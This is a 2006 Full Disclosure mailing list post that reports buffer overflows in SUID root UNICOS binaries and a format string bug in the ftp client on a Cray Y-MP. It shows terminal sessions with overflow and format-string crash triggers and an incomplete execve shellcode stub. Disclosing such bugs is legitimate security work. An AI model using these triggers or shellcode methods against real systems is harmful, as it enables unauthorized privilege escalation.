Full Disclosure mailing list archives
SUID root overflows in UNICOS and partial shellcode
From: Micheal Turner <wh1t3h4t3 () yahoo co uk>
Date: Tue, 10 Jan 2006 16:49:08 +0000 (GMT)
Cray PVP Exploitation (Historical Hacking) ========================================= ------------------[ Misc CPU information This Cray Y-MP EL with 4 CPUs and 1 GB of RAM is running UNICOS Release 9.0 [guest@yel guest]$ uname -a sn5176 sn5176 9.0.2.2 sin.0 CRAY Y-MP [guest@yel guest]$ df / (/dev/dsk/root ): 129232 .5K blocks ( 14.7%) 25880 I-nodes /tmp (/dev/dsk/tmp ): 1966952 .5K blocks ( 98.3%) 62402 I-nodes /usr (/dev/dsk/usr ): 7016 .5K blocks ( 0.5%) 22571 I-nodes /usr/src (/dev/dsk/src ): 429312 .5K blocks ( 44.7%) 25958 I-nodes /adddisk1 (/dev/dsk/opt ): 704760 .5K blocks ( 58.7%) 31671 I-nodes /proc (/proc ): 2007520 .5K blocks ( 97.6%) 629 procs /onserver (server:/disk1/exports/yel): 54180728 .5K blocks ( 70.4%) /home (server:/disk1/home): 54180728 .5K blocks ( 70.4%) /var/sysinfo (server:/var/sysinfo): 7389440 .5K blocks ( 61.7%) /secure (server:/secure ): 7389440 .5K blocks ( 61.7%) ==================[ Vulnerabilities ------------------[ /usr/bin/script suid root command line args buffer overflow -rwsr-xr-x 1 root bin 730000 Sep 5 1996 /usr/bin/script [guest@yel guest]$ script `perl -e 'print "A"x1000'` Operand range error (core dumped) ------------------[ /etc/nu suid root file parsing buffer overflow -rwsr-xr-x 1 root bin 1045400 Sep 4 1996 /etc/nu [guest@yel guest]$ echo "" >> /tmp/acid [guest@yel guest]$ udbgen -p /tmp udbgen: An acid file with at least one line is required Acid format: 'account_name:account_id' udbgen: /tmp/group: No such file or directory udbgen: A group file with at least one line is required Group format: 'group_name:*:group_id:' [guest@yel guest]$ echo `perl -e 'print "A"x10000'` >> /tmp/script [guest@yel guest]$ /etc/nu -p /tmp -c /tmp/script -a admin/udb/nu/nu.c 90.7 09/03/96 10:43:53 (sn5176:/tmp/script) nu: no GroupHome information in /tmp/script Operand range error (core dumped) -----------------[ /bin/ftp QUOTE format string vuln (BSD ftp client bug) [non suid] ftp> quote %08x.%08x.%08x.%08x. 500 'C00000000001D496.253038782E253038.782E253038782E25.3038782E0000001B.': command not understood. ftp> quote %n%n%n%n%n Operand range error (core dumped) -----------------[ UNICOS Shellcoding CRAY PVP The CRAY PVP does not natively support a 'syscall' instruction(unlike the new Cray X1, where the OS node provides a system call interface to the other nodes.) instead, we will use the systems standard libaries (which are linked in to most, if not all applications). Particularly we will focus on 'libu.a', which provides the UNICOS Standard Library. ** INCOMPLETE ** [guest@yel guest]$ as -f myfile.s [guest@yel guest]$ segldr -e MAIN myfile.o -lu ldr-240 segldr: CAUTION Entry point 'MAIN' in module 'PROG1' from file 'myfile.o' was specified on an XFER directive but is not a primary entry. [guest@yel guest]$ ./a.out [guest@yel guest]$ cat myfile.s IDENT PROG1 MAIN ENTER CALL execve ;; arguements required. EXIT END [guest@yel guest]$ ------------------[ Documentation sites http://oscinfo.osc.edu:8080/dynaweb/@CategoryView http://dynaweb.tacc.utexas.edu:8080/dynaweb/@DisplayHomepage http://www.cray.com/ ___________________________________________________________ NEW Yahoo! Cars - sell your car and browse thousands of new and used cars online! http://uk.cars.yahoo.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- SUID root overflows in UNICOS and partial shellcode Micheal Turner (Jan 10)